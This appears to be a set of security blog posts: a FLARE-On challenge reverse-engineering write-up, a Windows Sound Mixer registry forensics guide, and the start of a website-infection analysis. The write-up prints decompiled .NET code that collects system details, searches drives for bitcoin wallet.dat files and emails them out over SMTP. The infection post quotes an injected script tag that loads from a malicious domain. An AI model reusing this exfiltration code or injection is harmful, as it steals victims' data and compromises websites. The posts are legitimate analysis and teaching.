By some basic analysis, the sample first determines if HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost is set and, if not, copies itself to C:\Windows\System32\svchost.dll and entrenches in the registry there as "c:\windows\system32\rundll32.exe c:\windows\system32\svchost.dll". Overall, pretty common functionality for a lot of malware.



Following the code flow, I see a clear sign of a very basic keylogger. There is an API call to passively retrieve keystrokes from the buffer (GetAsyncKeyState()) and then a large switch statement for most keys on the keyboard:







By following one of these routines, for the letter A, I see a lot of global boolean values being checked to eventually toggle a new one on or off. Just through deduction, I realize that the booleans being set to true (1) are only set within that respective keystroke and are checked in others, suggesting that some keys need to be typed before others for that key to be toggled on.





In essence, the program is keylogging and looking for a particular word or phrase to be typed in. With this known, I go about labeling each and every subroutine, and then each respective boolean value. This helps explain the labels in the screenshot above, but also showed that in many keystrokes there are no actions taken, suggesting that the malware doesn't care if they are pressed. After a series of naming, it definitely shows that there's a limited set of keys being logged:




With those set, you could attempt to trace through them keystrokes like a backwards choose-your-own-adventure series (because I always wanted to see how to get to the goriest deaths), but there was an easier way that didn't require running the malware. When you create global variables and constants in C it will group them together. And so by double clicking on any global boolean you can see it in the context of the rest of the global values. I ignored this at first, thinking that the author would obfuscate the series of values so that they wouldn't read as an email ... but I was wrong. They were in direct sequence and spelled out the email address (l0ggingdoturdot...):




When initially pulling out the email I noticed one issue. The email was l`gging.Ur.5tr0ke5. There shouldn't be an apostrophe there, so I checked my code again. When I started xref'ing the values to double check I realized that the apostrophe keystroke was used to set the letter "0". 






Odd... regardless, I change the character and get the legitimate email: l0gging.Ur.5tr0ke5@flare-on.com



The email was sent off that morning of 25 July at 0923 after spending about 2 hours on it. Then, I went to work.




Challenge 6





At this point I notify my coworkers that I was starting on the challenge and learned that two were already on #6. However, we maintained the professional courtesy of not sharing with each other :)



They warned me that #6 was told to be the most difficult challenge of the entire series, with every previous challenge just to separate the chaff. And, they weren't wrong.


File Name       : e7bc5d2c0cf4480348f5504196561297
File Size       : 1,221,064 bytes
MD5             : e7bc5d2c0cf4480348f5504196561297
SHA1            : 7ff95920877af815c4b33da9a4f0c942fe0907d6
Fuzzy           : 12288:AAgOYrVfqiJwPy4Yj7/fb358YegLauCC9yJawoguxK1wT2syIvj90NK8:/cVfqiJUyL73b358YegxCsKKwI7CJ
Magic           : ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, for GNU/Linux 2.6.24, stripped
SignSrch        : offset   num  description [bits.endian.size]
                  000f7945 2417 MBC2 [32.le.248&]
                  000f8320 173  CRC-1 [crc8.0x01 le rev int_min.256]
                  000f8320 171  CRC-1 [crc8.0x01 lenorev int_min.256]
                  000f863c 2418 MBC2 [32.be.248&]
                  000f90d4 3051 compression algorithm seen in the game DreamKiller [32.be.12&]


Nice! A 64-bit Linux ELF. I've had experience with only a handful of ELFs, previously doing a few Phalanx, Tiny Shell, ChikDOS, and a difficult sample for my RSA interview. The 64-bit proved a bit of a hurdle as it meant I couldn't decompile any of the functions (at the time I was using 6.5; 6.6 had just recently been introduced with that feature).

I first attempted a static analysis of the file and gave up within a few hours. There were 2400 routines, with a majority appearing similar to the one shown below:



This would require debugging to get anywhere, and I am not particularly fond of IDA Pro's debugger. I'm quite fond of Immunity/Olly and right clicking on arbitrary values to show them in hex, and to see comparisons live with actual address names instead of "data[ebp+410]", but I digress. There is no Immunity/Olly available for Linux, but there is Evan's Debugger (EDB). That afternoon I sat down and ran through the sample.

The first thing to note was that it required command line arguments, but didn't tell you how many or what they were. 



At this point, I decide to force myself to go the Linux route. Both coworkers were comfortable with IDA, and one had already created a set of FLIRT signatures to identify all of the statically linked routines. After an hour of learning to do the same he noted that there were very few routines resolved, so I went back to just forcing my way through. Hitting too many issues with EDB, with just not enough comfort with it, I switched back to IDA Pro.

I used the remote debugger within IDA Pro to run the sample. I created a new Xubuntu VM and placed the malware sample and the IDA remote debugger app on the desktop, networked the two VMs together, and kicked it off.

In debugging to determine how many I should have, I set multiple breakpoints along different routes to see which number of args would take me the farthest. As no calls were documented (via previous IDA FLIRT sigs), they had to be done by hand. That means determining what TerminateProcess(), printf(), strcmp(), CreateFileA(), etc are by sight. This took a long time but paid off. After spending hours following the flow of logic to see where it would crash, I hit upon the key to the first argument:

In the code above the sample checks the length of the first argument to make sure it's 10 bytes. It then XOR's the entire argument by 0x56 and checks the result against "bngcg`debd". Failing either causes a print of "bad" and TerminateProcess(). XOR'ing that value shows that arg1 must be set to "4815162342".
I ran back and ran the sample with that as the argument. Good news, no more bad! Bad news... it "froze".
This leads to another issue going on with this sample. It relies upon syscall() greatly for many of its functions, sort of as a consolidated API for multiple functions, depending on what value you push to it, similar to network RPC. However, it took some time to realize that 64-bit Linux syscall() values were not the same as 32-bit. I eventually used this site as a resource: Linux System Call Table for x86_64

The sample uses syscalls to throw a few wrenches at you. First, it makes a call to sys_ptrace to check for a debugger. It then later (after verifying the first arg) calls sys_nanosleep to enter deep sleeps before further execution.
The direct way around this was to just patch the bytes with a hex editor in the sample and reload the binary.

PATCH syscall 101 (ptrace?)
OLD: E8 9A 50 05 00 48 C1 E8 3F 84 C0 74 14
NEW: E8 9A 50 05 00 48 C1 E8 3F 84 C0 EB 14

PATCH syscall 35 (sleep?)
.text:0000000000473D49 B8 23 00 00 00 mov eax, 35 ; sys nanosleep
.text:0000000000473D4E 0F 05 syscall
OLD: B8 23 00 00 00 0F 05
NEW: 90 90 90 90 90 90 90

PATCH syscall 35 (sleep?)
.text:0000000000473D6A B8 23 00 00 00 mov eax, 35 ; sys nanosleep
.text:0000000000473D6F 0F 05 syscall
OLD: B8 23 00 00 00 0F 05
NEW: 90 90 90 90 90 90 90


After passing this check the sample returned up to the main function and went down a large rabbit hole of subroutines that all looked similar to the beginning. I stepped through most of it, trying to follow the flow of data. After a few dozen were called I noticed a block of what looked like Base64 data being written to memory. However, it was written out of sequence with large portions of null data mixed in.


Let me stop to mention that at this point many hours have gone by. I had started on Friday afternoon, and this is now Sunday evening. This sample took a lot of time to debug properly and clear attention to where breakpoints should be placed. I neglected to do much of that, so there were many hours of wasted work. 

It is now Monday. Eventually, I see an anonymous-looking subroutine call another, which called another, and another, all of which caused the program to stop if I stepped over them. At this point I was no longer following the data, but sit hitting stepping until I saw interesting instructions... and then I saw call rdx. Too late, I had F8'd over it and the program stopped. 

The day is growing long and I grow tired. I restarted and got to that point again and looked around. The large block of Base64 data was completed and was decoded in memory. The sample them called into that code for more instructions. Following this, I was disheartened to see the results. Over 30 individual encoding routines, each checking a respective character of command line arg2.


I quickly write up decoders for the first few in Python but then hit a limit with type casting in Python. C will let you do operations like (0x40 ^ 0xBB + 0xF1) and keep the result within a single byte. Python won't easily. Frustrated at the level of effort still ahead of me, I crash and go to bed.

However, I instead lay in bed staring at the ceiling thinking this over, then quickly get up and run back to the basement. There was an incredibly easy way to do this! But... I didn't find it. I found a harder way, but still easier than re-writing each routine. As another solution noted, you could just start with a null byte and let the program do the math for you to get the byte. Too tired to even spin up my VMs, I just ran Ollydbg from my host, tapped into random memory space, and hand-transcribed the operations in reverse:


Now THAT is ghetto reversing ... Slowly the letters worked their way out and, at 00:26 on 29 July, I had the answer of l1nhax.hurt.u5.a1l@flare-on.com. Four and a half days of analysis ... I submit and crash in bed.


Challenge 7


This is it, the final challenge. I had two days left to wrap this up, and I quickly woke up to jump at it.

File Name       : a954bde7092791b06385a9617ba85415
File Size : 195,584 bytes
MD5 : a954bde7092791b06385a9617ba85415
SHA1 : edb86bfa4d9272bac264dacc68ba1e8fa8878793
Fuzzy : 3072:8biJ9nQgBfhfyBmr1UrjqvYdCVMi+z8HUrmv0UPBn/sNAc6n0OcGh6IVlo:8kQg7Amr1UfrCWZ881UPpsGY7GfP
Import Hash : e1a627890bc24cc28061ac3baf4662fe
Compiled Time : Sun Jul 06 22:05:19 2014 UTC
PE Sections (5) : Name Size MD5
.text 52,224 ab6c9a52eaf1b3b59c115abc63f1a80b
.rdata 12,800 40b19e50cb9c3dbc60d3c243823de929
.data 123,392 322a18069e4bc7af15c1f7c025a61bbc
.rsrc 512 c9363b5b6ba262c2acc3d14a8d930c07
.reloc 5,632 ced1665f50bf5ac984eb759ef096f05f
Magic : PE32 executable for MS Windows (console) Intel 80386 32-bit
SignSrch : offset num description [bits.endian.size]
00410af0 2545 anti-debug: IsDebuggerPresent [..17]
004321b4 3032 PADDINGXXPADDING [..16]


Nothing out of the ordinary. I open the sample expecting horrendous amounts of encoding... and was surprised. The malware reversed very easily; there was a limited number of subroutines, the code was clean, and everything made sense. The challenge was a bit more insidious.

Inside the executable is an encoded executable. You can see it. As the program runs it performs various checks against the system, such as "is the system 64bit?". If it checks, it XOR decodes the data with one key. If it doesn't, it uses another key.

After a dozen checks, you have an executable that you can run. The problem is determining which code path will get you the final executable.

The obvious checks were eliminated: the "MZ" and "PE" bytes used other characters in the encoded file; you have to supply those on the command line. So, that took out the ability to search for 0x4d5a00 easily. I went straight to work documenting all of the keys and routines and writing a brute forcer. I would force every possible key against the executable until it developed a clean file. I'll admit that many of the checks were interesting, and followed core connectivity/verification checks that malware likes to use:


There were slight differences in how many of the functions performed their XOR'ing. Some were just to accommodate two keys in the same string. At the end they could've all been the same, but I tried to replicate them as I saw them, and wrote the following brute forcer:

# @bbaskin
importitertools

defx(data,key,keylen):
newdata=''
foriinrange(0,len(data)):
newdata+=chr(ord(data[i])^ord(key[i%keylen]))
returnnewdata

defx2(data,key,keylen):
newdata=''
foriinrange(0,len(data)):
newdata+=chr(ord(data[i])^ord(key[i&keylen]))
returnnewdata

defx3(data,key,num1,num2):
newdata=''
foriinrange(0,len(data)):
newdata+=chr(ord(data[i])^ord(key[(i&num1)+num2]))
returnnewdata

defx4(data,key,num1,num2):
newdata=''
foriinrange(0,len(data)):
newdata+=chr(ord(data[i])^ord(key[(i%num1)+num2]))
returnnewdata



defCheckPEB():
globaldata
ifrun[0]:
data=x(data,"UNACCEPTABLE!",13)
else:
data=x(data,"omglob",6)

defCheckSIDT():
globaldata
ifrun[1]:
data=x(data,"you're so bad",13)
else:
data=x(data,"you're so good",14)

defCheckVMXh():
globaldata
ifrun[2]:
data=x(data,"\x01",1)
else:
data=x(data,"f",1)

defCheckLastError():
globaldata
ifrun[3]:
data=x(data,"I'm gonna sandbox your face",27)
else:
data=x(data,"Sandboxes are fun to play in",28)

defCheckDebugger():
globaldata
ifrun[4]:
data=x(data,"Such fire. Much burn. Wow.",26)
else:
data=x(data,"I can haz decode?",17)

defCheck64Bit():
globaldata
ifrun[5]:
data=x(data,"Feel the sting of the Monarch!",30)
else:
data=x(data,"\x09\x00\x00\x01",4)

defCheckFriday():
globaldata
ifrun[6]:
data=x(data,"! 50 1337",9)
else:
data=x2(data,"1337",3)

defCheckFNBackDoge():
globaldata
ifrun[7]:
data=x(data,"MATH IS HARDLETS GO SHOPPING",12)
else:
data=x3(data,"MATH IS HARDLETS GO SHOPPING",15,12)

defCheckInternetAccess():
globaldata
ifrun[8]:
data=x2(data,"SHOPPING IS HARDLETS GO MATH",15)
else:
data=x4(data,"SHOPPING IS HARDLETS GO MATH",12,16)

defCheck5PM():
globaldata
ifrun[9]:
data=x2(data,"\x07w",1)
else:
data=x(data,"\x01\x02\x03\x05\x00\x78\x30\x38\x0D",9)

defCheckDNSROOT():
globaldata
ifrun[10]:
IP="192.203.230.10"
newdata=''
foriinrange(0,len(data)):
pos=i%len(IP)
newdata+=chr(ord(data[i])^ord(IP[pos]))
data=newdata

defCheckTwitter():
globaldata
ifrun[11]:
data=x(data,"jackRAT",7)

defCheckDebugger2():
globaldata
ifrun[12]:
data=x(data,"the final countdown",19)
else:
data=x(data,"oh happy dayz",13)

defXorPath():
globaldata
path="backdoge.exe"
data=x(data,path,12)


defmain():
globaldata
globalrun
CheckPEB()
CheckSIDT()
CheckVMXh()
CheckLastError()
CheckDebugger()
Check64Bit()
CheckFriday()
CheckFNBackDoge()
CheckInternetAccess()
Check5PM()
CheckDNSROOT()
CheckTwitter()
CheckDebugger2()
XorPath()


if__name__=="__main__":
globaldata
globalrun
fh=open('backdoge.exe','rb')
fh.seek(0x113f8)
data_back=fh.read(118272)
fh.close()

forruninitertools.product(range(2),repeat=13):
fn="E:\\Malware\\FLARE\\7\\out\\"
forzinitertools.product(*[run]):
fn+=str(z[0])
data=data_back
main()
ifdata[2]=="\x90"anddata[3]=="\x00"anddata[5]=="\x00"anddata[6]=="\x00":
printrun,data[0:12].encode('hex')
open(fn,'wb').write(data)

It's not great code, and not fast, but it worked. Eventually. I wasted an entire day of effort on this because I mis-numbered the offsets and so was not getting any positive results. This caused me to go extremely in depth with the script, only to learn my mistake the next day. <face palm>

After a few minutes of (successful) running, an executable alerted:

E:\malware\FLARE\7>7_bruteforce.py
(0, 0, 0, 1, 1, 0, 1, 1, 1, 0, 1, 1, 1) feeb9000030000000400050e


After applying the "MZ" and "PE", it became a legitimate executable!


File Name : gratz.exe
File Size : 118,272 bytes
MD5 : 4f2b4cc03199553ff39d7e214a4ee8c6
SHA1 : 2a6fc52764451e8d937f2dc0464aa0ba809031f4
Fuzzy : 3072:Bt9rJyNXrCJsq18PG/i9SICdn8rMA+GJJLOFiUF1hSBSi/NgXf5wq:b9rJgbI8P597rMryL2nFiBSAePq
Import Hash : f34d5f2d4577ed6d9ceec516c1f5a744
Compiled Time : Sat Jul 05 22:58:43 2014 UTC
PE Sections (3) : Name Size MD5
.text 115,712 9c7b5b112287933a9dd532548895a3ac
.rsrc 1,536 b34dc44cc95a966d8d2df8a209f2ecf1
.reloc 512 aaa13a058c9ceffaaf68b401a847b37c
Magic : PE32 executable for MS Windows (GUI) Intel 80386 32-bit Mono/.Net assembly
.NET Version : 2.0.0.0

First, I execute it to see what happens:


I had seen this guy being spread around Twitter by others finishing up, so I knew I was close. Seeing the .NET 2.0 here, I load the sample up in .NET Reflector for analysis.

The main Form1 function contains no overtly weird data for this form. There's no hidden buttons but not all labels are accounted for in the output. There are 7 labels (1-8, 7 is missing) and all are displayed except 2. Label2.text is missing from the form. 

Let's start from the beginning and monitor the form creation. The form starts a new thread to call a routine call lulzors:



This routine sets Label2.text, the missing equation, by sending obfuscated data to lulz.decoder4. I use Reflector to browse to the lulz module and see a few bits of obfuscation:

publicclasslulz
{
publicvoiddatwork()
{
objectobj2=(((""+this.decoder1("(\x0014\x0018Z.\x0010\r\x0019\x0003\x001bVpAXAWAXAWAXAWAXAWAXAWAXAWAXAWAXAWAXAp"))+this.decoder2("9\t\n\x001b\x001d\x0006\fIT")+Environment.MachineName+"\n")+this.decoder3("&\x001a\t\x001e=\x001c\x0004\r\x0005\x0017II")+Environment.UserDomainName+"\n")+this.decoder1("9\x0006\t\bVU")+Environment.UserName+"\n";
stringinfo=string.Concat(newobject[]{obj2,this.decoder2(";;I%\x0011\x001a\x001a\x001a\x001b\x0006SS"),Environment.OSVersion,"\n"});
foreach(stringstr2inEnvironment.GetLogicalDrives())
{
info=info+this.decoder3("7\x001b\x0005\x001a\x001cII")+str2+"\n";
this.yum(str2,this.decoder1("\x001b\x0014\0\x0016\t\x0001B\x001e\r\x0001"),refinfo);
}
stringstr3="";
foreach(IPAddressaddressinDns.GetHostEntry(Dns.GetHostName()).AddressList)
{
if(address.AddressFamily==AddressFamily.InterNetwork)
{
str3=address.ToString();
break;
}
}
info=info+this.decoder3(":9VL")+str3+"\n\n";
MailMessagemessage=newMailMessage();
message.To.Add(this.decoder2("\x0015\x0004X]\x0010\t\x001d]\x0010\t\x001d\x00124\x000e\x0005\x0012\x0006\rD\x001c\x001aF\n\x001c\x0019"));
message.Subject=this.decoder3(":N\x0001L\x0018S\n\x0003\x0001\t\x0006\x001d\t\x001e");
message.From=newMailAddress(this.decoder1("\0\0\0\0,\x0013\0\x001b\x001e\x0010A\x0015\x0002[\x000f\x0015\x0001"));
message.Body=info;
newSmtpClient(this.decoder2("\a\x0005\x001d\x0003Z\x001b\f\x0010\x0001\x001a\f\0\x0011\x001a\x001f\x0016\x0006F\a\x0016\0")).Send(message);
}

publicstringdecoder1(stringencoded)
{
stringstr="";
stringstr2="lulz";
for(inti=0;i<encoded.Length;i++)
{
str=str+((char)(encoded[i]^str2[i%str2.Length]));
}
returnstr;
}

publicstringdecoder2(stringencoded)
{
stringstr="";
stringstr2="this";
for(inti=0;i<encoded.Length;i++)
{
str=str+((char)(encoded[i]^str2[i%str2.Length]));
}
returnstr;
}

publicstringdecoder3(stringencoded)
{
stringstr="";
stringstr2="silly";
for(inti=0;i<encoded.Length;i++)
{
str=str+((char)(encoded[i]^str2[i%str2.Length]));
}
returnstr;
}

publicstringdecoder4(stringencoded)
{
stringstr="";
stringstr2=this.decoder2("\x001b\x0005\x000eS\x001d\x001bI\a\x001c\x0001\x001aS\0\0\fS\x0006\r\b\x001fT\a\a\x0016K");
for(inti=0;i<encoded.Length;i++)
{
str=str+((char)(encoded[i]^str2[i%str2.Length]));
}
returnstr;
}

publicvoidyum(stringfolder,stringname,refstringinfo)
{
try
{
foreach(stringstrinDirectory.GetFiles(folder))
{
if(str.EndsWith(name))
{
byte[]inArray=File.ReadAllBytes(str);
info=info+this.decoder3("=\x0006\x0001\x001fCS")+str+"\n";
info=info+Convert.ToBase64String(inArray)+"\n";
}
}
foreach(stringstr2inDirectory.GetDirectories(folder))
{
this.yum(str2,name,refinfo);
}
}
catch(Exceptionexception)
{
Console.WriteLine(exception.Message);
}
}
}

The first thing I noticed was the creation of an email in datwork(), where obfuscated fields are used to create the recipient, subject, and body. We'll come back to that.

There are multiple "decoder" functions, each simply doing multi-byte XOR against static strings: lulz, this, silly, and an obfuscated value that resolves to. "omg is this the real one?". I recreated each in Python, decoded the values, and replaced them back into the source:

publicclasslulz
{
publicvoiddatwork()
{
objectobj2=(("Dat Beacon:\n-----------------------------------\n"+"Machine: "+Environment.MachineName+"\n")+"UserDomain:"+Environment.UserDomainName+"\n")+"User: "+Environment.UserName+"\n";

stringinfo=string.Concat(newobject[]{obj2,"OS Version: ",Environment.OSVersion,"\n"});
foreach(stringstr2inEnvironment.GetLogicalDrives())
{
info=info+"Drive: "+str2+"\n";
this.yum(str2,"wallet.dat",refinfo);
}
stringstr3="";
foreach(IPAddressaddressinDns.GetHostEntry(Dns.GetHostName()).AddressList)
{
if(address.AddressFamily==AddressFamily.InterNetwork)
{
str3=address.ToString();
break;
}
}
info=info+"IP: "+str3+"\n\n";
MailMessagemessage=newMailMessage();
message.To.Add("al1.dat.data@flare-on.com");
message.Subject="I'm a computer";
message.From=newMailAddress("lulz@flare-on.com");
message.Body=info;
newSmtpClient("smtp.secureserver.net").Send(message);
}

publicvoidyum(stringfolder,stringname,refstringinfo)
{
try
{
foreach(stringstrinDirectory.GetFiles(folder))
{
if(str.EndsWith(name))
{
byte[]inArray=File.ReadAllBytes(str);
info=info+"Noms: "+str+"\n";
info=info+Convert.ToBase64String(inArray)+"\n";
}
}
foreach(stringstr2inDirectory.GetDirectories(folder))
{
this.yum(str2,name,refinfo);
}
}
catch(Exceptionexception)
{
Console.WriteLine(exception.Message);
}
}
}



Let me just say ... WTF?! This routine will build basic data about your system to email out but, more specifically, search all of your local hard drives for a bitcoin wallet. If found, the contents will be copied and emailed to FireEye. Maybe it's just to highlight the importance of running within a VM, or without Internet access, but ...


Anyhow, this is all secondary to the purpose of the file, to get the email. And that "al1.dat.data@flare-on.com" is not the correct one. Instead, we need to go back to the form and find the data being send into decoder4(). Resolving it gives:

da7.f1are.finish.lin3@flare-on.com

That sounds like it! Beaten, and exhausted, I shoot the final email off at 1750 on 31 July, with just over an hour before my personal deadline. Two and a half days were spent on this last challenge. I receive my confirmation two minutes later and go open a bottle of whisky.


After a few days I received a follow-up email asking how I completed the last few challenges, which I replied to, and then received my award on 20 September, an RMO designating my finish order (0x83 or 131):



Thanks to FireEye and the FLARE team for a fun challenge! I had a lot of fun and constructive frustration in solving them. We all know this was a recruitment drive, but it was still fun :)

Thanks to my friend Dan Raygoza for some pep talks and advice to keep me from going too far down the wrong roads on #6 and #7. And to Nicolas Brulez who helped me understand that I was on the right road with finishing #7.

Thanks you for reading, and I hope this helps anyone else in the field!

DJ Forensics: Analysis of Sound Mixer Artifacts

$
0
0
In many forensics examinations, including those of civil and criminal nature, there is an art to finding remnants of previously installed applications. Fearing detection, or assuming that an examination is forthcoming, many suspects attempt to remove unauthorized or suspicious applications from a system. Such attempts are usually unsuccessful and result only in additional hours of processing for forensics. But even with a clean uninstall there are traces left within the Windows registry that note such a program was installed.

The most popular of these is the Windows Shim Cache (a/k/a Application Compatibility Database, a/k/a AppCompatCache), a resource that can be used to catalog applications not natively compiled for newer Windows. It's also a resource that works great for finding APT-related malware running on a system, but not so much legitimate applications.

For a few months I've been playing with another repository of applications: the Windows Sound Mixer. Whenever an application requests the use of the Windows audio drivers, Windows will automatically register this application in the registry. This information is stored so that Windows can create per-application sound settings:



This was a resource I dismissed for a year. It existed only in Windows Vista and newer, it didn't catch any of the malware I threw at it, and wasn't relevant to any of the Incident Response work I do**. Its importance came to me when working some cases that came mixed in with many of my intrusion cases where I had to examine the systems owned by various hackers. One in particular involved tracking the use of alternative web browsers and discovering that the Sound Mixer had catalogued the use, and location, of Tor Browser launched from a TrueCrypt volume. Clear as day, the path even noted that it was a TrueCrypt volume based upon the Windows device name:

\Device\TrueCryptVolumeP\Tor\App\Firefox\firefox.exe

I learned that the registry keys were useful for such cases, but there has been no prior public discussion of the forensic use of this data.




** After some testing ideas from Michael Zeberlein, I determined that many RATs with audio capturing abilities do get flagged by the Sound Mixer. However, many only do so when the adversary actively engages that feature. This was tested with SpyGate and DarkComet.

Windows collects this data in the user's NTUSER.DAT registry hive as:

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore

From this key are a series of sub-keys, one for each individual application stored. What we are really concerned about is the "(Default)" (REG_SZ) value stored for each sub-key. An example of this value is:

{0.0.0.00000000}.{e64c029e-480d-424c-a775-2fd663e1442f}|\Device\HarddiskVolume2\Program Files\VideoLAN\VLC\vlc.exe%b{00000000-0000-0000-0000-000000000000}

This value stores the path of the program, the sound device registered, and other assorted data:

  • {0.0.0.00000000}.{e64c029e-480d-424c-a775-2fd663e1442f}
  • \Device\HarddiskVolume2\Program Files\VideoLAN\VLC\vlc.exe
  • %b
  • {00000000-0000-0000-0000-000000000000}

The first value corresponds to the output audio device for which the application can access. The second is the path to the application, followed by an unknown delimiter and finally a GUID referencing any audio input devices (microphones) used by the application.

Referencing Output Devices


For the vast majority of applications, the GUID for the output device will be for the generic "Speakers" device. These values can be correlated to multiple places in the registry. The easiest way would be to search the user's output devices in HKEY_CURRENT_USER\Software\Microsoft\Speech\AudioOutput\TokenEnums\MMAudioOut, however these values only contain values for current hardware, and those that the user has access to.

Instead, we reference the system list of rendering devices stored at HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Render. Each sub-key under this key is a GUID that corresponds to the devices we see noted in the Sound Mixer list. For each GUID there is a sub-key named Properties with a constant value of "{a45c254e-df1c-4efd-8020-67d146a850e0},2" (PKEY_AudioEndPoint_Interface) that contains the device name.



This is a very long-about way of saying to retrieve the value from HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Render\<GUID>\FxProperties\{a45c254e-df1c-4efd-8020-67d146a850e0},2 to get the device name. For example:

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Render\{e64c029e-480d-424c-a775-2fd663e1442f}\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0},2 = Speakers

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Render\{bfb5623f-3f3c-4245-803f-d4bae95d0016}\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0},2 = H243H  (A monitor with speakers)

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Render\{799503ed-68e3-4293-9905-8a6bc8823094}\Properties{a45c254e-df1c-4efd-8020-67d146a850e0},2 = E320i-A0   (A TV that was previously hooked up)


Again, there are forensic implications that can be determined from this. At one point there was an E320i-A0 TV hooked up. I can grab the modification times from the registry keys to determine an approximate time range for that (new applications stored after the device was installed) and also to determine when the device was removed (new applications stored later that don't reference it). This information can show the portability of the system, such as when a laptop is connected to a docking station.


Referencing Input Devices

Obtaining the input device is performed the same way as retrieving the output device. Instead of a Render device, we'll obtain the Capture device. However, for my test systems, there were two sets of Microphone and Line-In devices, but some of the Sound Mixer applications contained input GUIDs that weren't found in the registry. Further analysis showed that all of these applications were created on the same day, when I had reinstalled Windows on a new system, suggesting that they were related to GUIDs from my old hardware.

These sub-keys contain the same structure as the output devices and can be parsed the same way.


The majority of retrieved applications will have an input GUID of '{00000000-0000-0000-0000-000000000000}' to note that the application did not have any input devices associated with it.

Bringing It All Together

Based on this data, we can extract the application list, obtain the last modified time for each key, and correlate the audio device to get a listing like this:

Date,Output Device,Volume,Input Device,Application
2013-09-04,21:03:32,Speakers,N/A,N/A,\Device\HarddiskVolume2\Program Files (x86)\Fiddler2\Fiddler.exe
2013-09-06,19:54:48,Speakers,N/A,N/A,\Device\HarddiskVolume2\Program Files (x86)\Hopper Disassembler\Hopper.exe
2013-09-18,21:22:27,Speakers,128,N/A,\Device\HarddiskVolume2\Program Files (x86)\Steam\SteamApps\common\Gunpoint\Gunpoint.exe
2013-11-08,11:14:59,Speakers,140,N/A,\Device\HarddiskVolume2\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_11_9_900_117.exe
2013-11-23,23:24:57,Speakers,128,N/A,\Device\HarddiskVolume2\Program Files (x86)\Vuze\Azureus.exe
2013-12-27,20:41:55,Speakers,128,N/A,\Device\HarddiskVolume2\Program Files (x86)\Folder Size\FolderSize.exe
2014-01-21,21:42:24,Speakers,128,N/A,\Device\HarddiskVolume2\Program Files\Oracle\VirtualBox\VirtualBox.exe
2014-01-21,23:34:42,Speakers,N/A,N/A,\Device\HarddiskVolume2\Program Files (x86)\sqlitebrowser_200_b1_win\SQLite Database Browser 2.0 b1.exe
2014-01-25,19:57:25,Speakers,128,N/A,\Device\HarddiskVolume2\Program Files (x86)\Course Vector\minerva\minerva.exe
2014-02-17,02:43:10,Speakers,40,N/A,\Device\HarddiskVolume2\Users\Brian\Desktop\Tor Browser\Browser\firefox.exe
2014-11-10,17:04:02,Speakers,128,N/A,\Device\TrueCryptVolumeP\Tor\App\Firefox\firefox.exe


Returning back to the application data, the rest of the information holds minor value to us. The vast majority of applications will also store the volume information as a sub-key, although some will not. This volume information is stored in a static GUID sub-key of "{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F}" in a value named "3".




The value of "3" (REG_BINARY) contains a large set of binary data, but only one single byte refers to the audio setting, highlighted in yellow below.

04 00 00 00 00 00 00 00 00 00 80 3F 00 00 00 00 00 00 00 00 00 00 00 00

This value ranges from 0-255, with the default 0x80 referring to the median volume of 128. There is additional significance that can be read into this value, especially if a subject chooses to keep certain applications at a very low volume.

Unknowns:


  • There is no apparent correlation between the application sub-key name and any other data in the registry. This key name may be randomly generated.
  • The GUID sub-key under each application is "{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F}". There is no documentation on this GUID except that it is unique to this family of data.
  • The application registry values of "4" and "5" all contain unknown binary data that were identical in all applications on the test systems. The usage of these keys is unknown.
  • Every system will have at least one application named "#" that will always have an input device. The purpose of this application is unknown.


Scripts for Analysis:


I've written two scripts to acquire this information. One uses the Python _winreg library to acquire the information from the active, live system. The other uses the Python-Registry library to acquire the information from a set of registry files.

Both scripts are located on GitHub for download.  Note that because the application subkeys appear randomly generated, the output from each should be piped to `sort` to see the applications in chronological order.

Example usage:

E:\Development\SoundMixer>SoundMixer_Hive.py -s reg\SOFTWARE -n reg\NTUSER.DAT
2014-05-28,02:31:00,Speakers,N/A,N/A,\Device\HarddiskVolume1\Program Files (x86)\Google\Chrome\Application\chrome.exe
2014-11-07,15:46:18,Speakers,128,N/A,\Device\HarddiskVolume1\Program Files (x86)\VideoLAN\VLC\vlc.exe
2014-05-28,00:10:42,Speakers,N/A,{A9EF3FD9-4240-455E-A4D5-F2B3301887B2},#

Harlan Carvey has also updated his RegRipper application with new plugins based upon this information, so you can immediately test the data in your analysis process.

Analysis of Web-based Malware Attack

$
0
0
Due to the very nature that this is a website on the Internet means that eventually it would be susceptible to an attack. Wordpress and blog sites are notoriously targeted with infections that append code to HTML files that point them to malicious or advertisement websites. My website was similarly affected last month. Here is how the issue was identified and rectified in just a few minutes after notification.

Notification came by way of Twitter when a friend notified me that my site was redirecting to somewhere else.  I was sitting at my desk and quickly opened it to verify.  Sure enough, it was:

Malware infection shown to visitors


I SSH'd into the system and immediately changed the password. I then started looking for the culprit. The main file that was causing the redirection was named 'books.htm' and was in my web root folder. This was a simple HTML page that just lists the book projects I've worked on.

The first thing I did was manually view the file to see the impact. There was an added line of code to the very beginning of the file:


<script src="http://globalpoweringgathering.com/nl.php?p=1"></script>\n
With the infection spotted, I checked the file's MAC times to see when the attack occurred:



$ stat books.htm
File: `books.htm'
Size:1500 Blocks:8 IO Block:4096 regular file
Device:811h/2065d Inode:275324414 Links:1
Access: (0664/-rw-rw-r--) Uid: (10369090/ bbaskin) Gid: (45673/pg144238)
Access: 2010-07-19 07:10:46.000000000 -0700
Modify: 2011-04-02 23:35:38.000000000 -0700
Change: 2011-04-02 23:35:38.000000000 -0700

Looking at the results of this file shows that the file was modified and changed on April 2nd at 11:35PM. This is just one file, so we need to compare against another file to verify the date and time. A quick spot check showed an additional HTM file with the infection:



$ stat faq.htm
File: `faq.htm'
Size:143 Blocks:8 IO Block: 4096 regular file
Device:811h/2065d Inode:275322846 Links:1
